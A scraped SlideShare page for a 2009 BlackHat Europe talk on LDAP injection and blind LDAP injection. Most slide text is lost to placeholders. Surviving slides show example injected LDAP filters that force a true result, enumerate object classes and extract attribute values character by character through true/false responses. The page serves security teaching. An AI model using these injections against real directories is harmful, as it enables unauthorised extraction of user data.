SlideShare une entreprise Scribd logo

LDAP Injection & Blind LDAP Injection

Télécharger en tant que PPT, PDF
Chema Alonso
Chema Alonso

This talk was delivered in BlackHat Europe 2009 by Chema Alonso & José Parada.

1  sur  50
Testing WebApps in a OpenLDAP & ADAM environmet Chema Alonso – [email_address] Microsoft MVP Corporate Security Security Consultant – Informática64 http://www.informatica64.com
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object]
 
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
 
Login Process in a Webapp
Login Process in a Webapp
Elevation of Privileges in an unsecure WebApp
Elevation of Privileges in an unsecure WebApp
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
 
Accessing data in an unsecure WebApp
Accessing data in an unsecure WebApp
[object Object],[object Object],[object Object],[object Object],[object Object]
Example: (& (objectClass=printer)(type=HP LaserJet 2100)) Injection to obtain the TRUE result: (&(objectClass=printer)(type=HP LaserJet 2100) (objectClass=*) ) Injections to obtain the objectClass values: (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=logins) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=docs) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=news) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=adms) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=users) ) … .
 
Discovering attributes in a unsecure WebApp Attribute NOT exists (or there is not access privilege)
Discovering attributes in a unsecure WebApp Attribute exists (and there is access privilege)
[object Object],[object Object],[object Object],[object Object]
[object Object],Low index: 1 – High index: 10 – Middle value: 5 (&(objectClass= *)(uid=jparada)(salary>=5) ) ->FALSE Low index: 1 – High index: 5 – Middle value: 2 (&(objectClass= *)(uid=jparada)(salary>=2) ) ->TRUE Low index: 2 – High index: 5 – Middle value: 3 (&(objectClass= *)(uid=jparada)(salary>=3) ) ->TRUE Low index: 3 – High index: 5 – Middle value: 4 (&(objectClass= *)(uid=jparada)(salary>=4) ) ->FALSE Low index: 4 – High index: 4 – Middle value: 4 Salary=4 [million of € per month]
Injections to obtain department values using data booleanization: (&(objectClass=printer)(type= HP LaserJet 2100)(department=*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=a*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=b*) )-> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=c*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=d*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=e*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=f*) )->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=fa*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=fb*) ) -> FALSE … . (&(objectClass=printer)(type= HP LaserJet 2100)(department=fi*) )->TRUE
 
Data Booleanization in an unsecure WebApp False
Data Booleanization in an unsecure WebApp True
Data Booleanization in an unsecure WebApp False
Data Booleanization in an unsecure WebApp True
Injections to obtain charset used for store data in a attribute: (&(objectClass=printer)(type= HP LaserJet 2100)(department=*a*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*b*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*c*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*d*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*e*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*f*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*g*) )->FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*h*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*i*) ) ->TRUE … . (&(objectClass=printer)(type= HP LaserJet 2100)(department=*z*) )->TRUE
 
Charset Reduction in an unsecure WebApp False
Charset Reduction in an unsecure WebApp True
[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Recommandé

An introduction to denial of service attack
An introduction to denial of service attackAn introduction to denial of service attack
An introduction to denial of service attack
Mohammad Reza Mousavinasr
 
Firewall
FirewallFirewall
Firewall
nayakslideshare
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
Man in The Middle Attack
Man in The Middle AttackMan in The Middle Attack
Man in The Middle Attack
Deepak Upadhyay
 
Denial of service
Denial of serviceDenial of service
Denial of service
garishma bhatia
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI Attacks
Imperva
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
Traditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation FirewallTraditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation Firewall
美兰 曾
 

Recommandé

An introduction to denial of service attack
An introduction to denial of service attackAn introduction to denial of service attack
An introduction to denial of service attack
Mohammad Reza Mousavinasr
 
Firewall
FirewallFirewall
Firewall
nayakslideshare
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
Man in The Middle Attack
Man in The Middle AttackMan in The Middle Attack
Man in The Middle Attack
Deepak Upadhyay
 
Denial of service
Denial of serviceDenial of service
Denial of service
garishma bhatia
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI Attacks
Imperva
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
Traditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation FirewallTraditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation Firewall
美兰 曾
 
Basics of Denial of Service Attacks
Basics of Denial of Service AttacksBasics of Denial of Service Attacks
Basics of Denial of Service Attacks
Hansa Nidushan
 
DDOS Attack
DDOS Attack DDOS Attack
DDOS Attack
Ahmed Salama
 
(SEC306) Defending Against DDoS Attacks
(SEC306) Defending Against DDoS Attacks(SEC306) Defending Against DDoS Attacks
(SEC306) Defending Against DDoS Attacks
Amazon Web Services
 
Wifi Security
Wifi SecurityWifi Security
Wifi Security
Shital Kat
 
Android Security
Android SecurityAndroid Security
Android Security
Arqum Ahmad
 
Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
DirkjanMollema
 
Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
Leon Teale
 
Hacking techniques
Hacking techniquesHacking techniques
Hacking techniques
gaurav koriya
 
Types Of Firewall Security
Types Of Firewall SecurityTypes Of Firewall Security
Types Of Firewall Security
iberrywifisecurity
 
AD & LDAP
AD & LDAPAD & LDAP
AD & LDAP
Cynoteck Technology Solutions Private Limited
 
Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)
btpsec
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injection
Vi Tính Hoàng Nam
 
LDAP Injection
LDAP InjectionLDAP Injection
LDAP Injection
NSConclave
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
n|u - The Open Security Community
 
Bettercap
BettercapBettercap
Bettercap
Shritesh Bhattarai
 
TOR NETWORK
TOR NETWORKTOR NETWORK
TOR NETWORK
Rishikese MR
 
Tor Network
Tor NetworkTor Network
Tor Network
Muhammad Jabir A C K
 
ClearPass 6.4.2 Release Notes
ClearPass 6.4.2 Release NotesClearPass 6.4.2 Release Notes
ClearPass 6.4.2 Release Notes
Aruba, a Hewlett Packard Enterprise company
 
The Rise of Active Directory Exploits
The Rise of Active Directory ExploitsThe Rise of Active Directory Exploits
The Rise of Active Directory Exploits
Enterprise Management Associates
 
Spark SQL Deep Dive @ Melbourne Spark Meetup
Spark SQL Deep Dive @ Melbourne Spark MeetupSpark SQL Deep Dive @ Melbourne Spark Meetup
Spark SQL Deep Dive @ Melbourne Spark Meetup
Databricks
 
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
DataWorks Summit
 

Contenu connexe

Tendances

I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
DirkjanMollema
 

Tendances (20)

Basics of Denial of Service Attacks
Basics of Denial of Service AttacksBasics of Denial of Service Attacks
Basics of Denial of Service Attacks
 
DDOS Attack
DDOS Attack DDOS Attack
DDOS Attack
 
(SEC306) Defending Against DDoS Attacks
(SEC306) Defending Against DDoS Attacks(SEC306) Defending Against DDoS Attacks
(SEC306) Defending Against DDoS Attacks
 
Wifi Security
Wifi SecurityWifi Security
Wifi Security
 
Android Security
Android SecurityAndroid Security
Android Security
 
Metasploit
MetasploitMetasploit
Metasploit
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
 
Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
 
Hacking techniques
Hacking techniquesHacking techniques
Hacking techniques
 
Types Of Firewall Security
Types Of Firewall SecurityTypes Of Firewall Security
Types Of Firewall Security
 
AD & LDAP
AD & LDAPAD & LDAP
AD & LDAP
 
Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injection
 
LDAP Injection
LDAP InjectionLDAP Injection
LDAP Injection
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
Bettercap
BettercapBettercap
Bettercap
 
TOR NETWORK
TOR NETWORKTOR NETWORK
TOR NETWORK
 
Tor Network
Tor NetworkTor Network
Tor Network
 
ClearPass 6.4.2 Release Notes
ClearPass 6.4.2 Release NotesClearPass 6.4.2 Release Notes
ClearPass 6.4.2 Release Notes
 
The Rise of Active Directory Exploits
The Rise of Active Directory ExploitsThe Rise of Active Directory Exploits
The Rise of Active Directory Exploits
 

Similaire à LDAP Injection & Blind LDAP Injection

Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
DataWorks Summit
 
Ado.Net Data Services (Astoria)
Ado.Net Data Services (Astoria)Ado.Net Data Services (Astoria)
Ado.Net Data Services (Astoria)
Igor Moochnick
 
Hack-Proof Your Drupal App
Hack-Proof Your Drupal AppHack-Proof Your Drupal App
Hack-Proof Your Drupal App
Erich Beyrent
 
The Power of Relationships in Your Big Data
The Power of Relationships in Your Big DataThe Power of Relationships in Your Big Data
The Power of Relationships in Your Big Data
Paulo Fagundes
 
Tackle Containerization Advisor (TCA) for Legacy Applications
Tackle Containerization Advisor (TCA) for Legacy ApplicationsTackle Containerization Advisor (TCA) for Legacy Applications
Tackle Containerization Advisor (TCA) for Legacy Applications
Konveyor Community
 

Similaire à LDAP Injection & Blind LDAP Injection (20)

Spark SQL Deep Dive @ Melbourne Spark Meetup
Spark SQL Deep Dive @ Melbourne Spark MeetupSpark SQL Deep Dive @ Melbourne Spark Meetup
Spark SQL Deep Dive @ Melbourne Spark Meetup
 
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
 
Introduction to apex
Introduction to apexIntroduction to apex
Introduction to apex
 
LDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections PaperLDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections Paper
 
UnderstandingLDAP.ppt
UnderstandingLDAP.pptUnderstandingLDAP.ppt
UnderstandingLDAP.ppt
 
Ldap
LdapLdap
Ldap
 
Apache Spark Workshop, Apr. 2016, Euangelos Linardos
Apache Spark Workshop, Apr. 2016, Euangelos LinardosApache Spark Workshop, Apr. 2016, Euangelos Linardos
Apache Spark Workshop, Apr. 2016, Euangelos Linardos
 
Import web resources using R Studio
Import web resources using R StudioImport web resources using R Studio
Import web resources using R Studio
 
Ado.Net Data Services (Astoria)
Ado.Net Data Services (Astoria)Ado.Net Data Services (Astoria)
Ado.Net Data Services (Astoria)
 
Mist - Serverless proxy to Apache Spark
Mist - Serverless proxy to Apache SparkMist - Serverless proxy to Apache Spark
Mist - Serverless proxy to Apache Spark
 
Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...
Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...
Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...
 
Hack-Proof Your Drupal App
Hack-Proof Your Drupal AppHack-Proof Your Drupal App
Hack-Proof Your Drupal App
 
The Power of Relationships in Your Big Data
The Power of Relationships in Your Big DataThe Power of Relationships in Your Big Data
The Power of Relationships in Your Big Data
 
Oracle NoSQL Database release 3.0 overview
Oracle NoSQL Database release 3.0 overviewOracle NoSQL Database release 3.0 overview
Oracle NoSQL Database release 3.0 overview
 
Seattle spark-meetup-032317
Seattle spark-meetup-032317Seattle spark-meetup-032317
Seattle spark-meetup-032317
 
Sql Summit Clr, Service Broker And Xml
Sql Summit Clr, Service Broker And XmlSql Summit Clr, Service Broker And Xml
Sql Summit Clr, Service Broker And Xml
 
OGSA-DAI DQP: A Developer's View
OGSA-DAI DQP: A Developer's ViewOGSA-DAI DQP: A Developer's View
OGSA-DAI DQP: A Developer's View
 
Modern Database Development Oow2008 Lucas Jellema
Modern Database Development Oow2008 Lucas JellemaModern Database Development Oow2008 Lucas Jellema
Modern Database Development Oow2008 Lucas Jellema
 
Tackle Containerization Advisor (TCA) for Legacy Applications
Tackle Containerization Advisor (TCA) for Legacy ApplicationsTackle Containerization Advisor (TCA) for Legacy Applications
Tackle Containerization Advisor (TCA) for Legacy Applications
 
LDAP
LDAPLDAP
LDAP
 

Plus de Chema Alonso

CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajar
Chema Alonso
 

Plus de Chema Alonso (20)

CyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitCyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging Fruit
 
Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0
 
Configurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoConfigurar y utilizar Latch en Magento
Configurar y utilizar Latch en Magento
 
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataCazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
 
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
 
CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajar
 
Dorking & Pentesting with Tacyt
Dorking & Pentesting with TacytDorking & Pentesting with Tacyt
Dorking & Pentesting with Tacyt
 
Pentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordPentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWord
 
Foca API v0.1
Foca API v0.1Foca API v0.1
Foca API v0.1
 
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7
 
It's a Kind of Magic
It's a Kind of MagicIt's a Kind of Magic
It's a Kind of Magic
 
Ingenieros y hackers
Ingenieros y hackersIngenieros y hackers
Ingenieros y hackers
 
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
 
Auditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIAuditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase II
 
El juego es el mismo
El juego es el mismoEl juego es el mismo
El juego es el mismo
 
El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?
 
Latch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalLatch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digital
 
Hacking con Python
Hacking con PythonHacking con Python
Hacking con Python
 
Shuabang Botnet
Shuabang BotnetShuabang Botnet
Shuabang Botnet
 
Tu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsTu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu Windows
 

LDAP Injection & Blind LDAP Injection

  • 1. Testing WebApps in a OpenLDAP & ADAM environmet Chema Alonso – [email_address] Microsoft MVP Corporate Security Security Consultant – Informática64 http://www.informatica64.com
  • 2.
  • 3.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.  
  • 17.
  • 18.  
  • 19. Login Process in a Webapp
  • 20. Login Process in a Webapp
  • 21. Elevation of Privileges in an unsecure WebApp
  • 22. Elevation of Privileges in an unsecure WebApp
  • 23.
  • 24.  
  • 25. Accessing data in an unsecure WebApp
  • 26. Accessing data in an unsecure WebApp
  • 27.
  • 28. Example: (& (objectClass=printer)(type=HP LaserJet 2100)) Injection to obtain the TRUE result: (&(objectClass=printer)(type=HP LaserJet 2100) (objectClass=*) ) Injections to obtain the objectClass values: (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=logins) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=docs) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=news) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=adms) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=users) ) … .
  • 29.  
  • 30. Discovering attributes in a unsecure WebApp Attribute NOT exists (or there is not access privilege)
  • 31. Discovering attributes in a unsecure WebApp Attribute exists (and there is access privilege)
  • 32.
  • 33.
  • 34.
  • 35.
  • 36. Injections to obtain department values using data booleanization: (&(objectClass=printer)(type= HP LaserJet 2100)(department=*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=a*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=b*) )-> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=c*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=d*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=e*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=f*) )->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=fa*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=fb*) ) -> FALSE … . (&(objectClass=printer)(type= HP LaserJet 2100)(department=fi*) )->TRUE
  • 37.  
  • 38. Data Booleanization in an unsecure WebApp False
  • 39. Data Booleanization in an unsecure WebApp True
  • 40. Data Booleanization in an unsecure WebApp False
  • 41. Data Booleanization in an unsecure WebApp True
  • 42. Injections to obtain charset used for store data in a attribute: (&(objectClass=printer)(type= HP LaserJet 2100)(department=*a*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*b*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*c*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*d*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*e*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*f*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*g*) )->FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*h*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*i*) ) ->TRUE … . (&(objectClass=printer)(type= HP LaserJet 2100)(department=*z*) )->TRUE
  • 43.  
  • 44. Charset Reduction in an unsecure WebApp False
  • 45. Charset Reduction in an unsecure WebApp True
  • 46.
  • 47.
  • 48.
  • 49.
  • 50.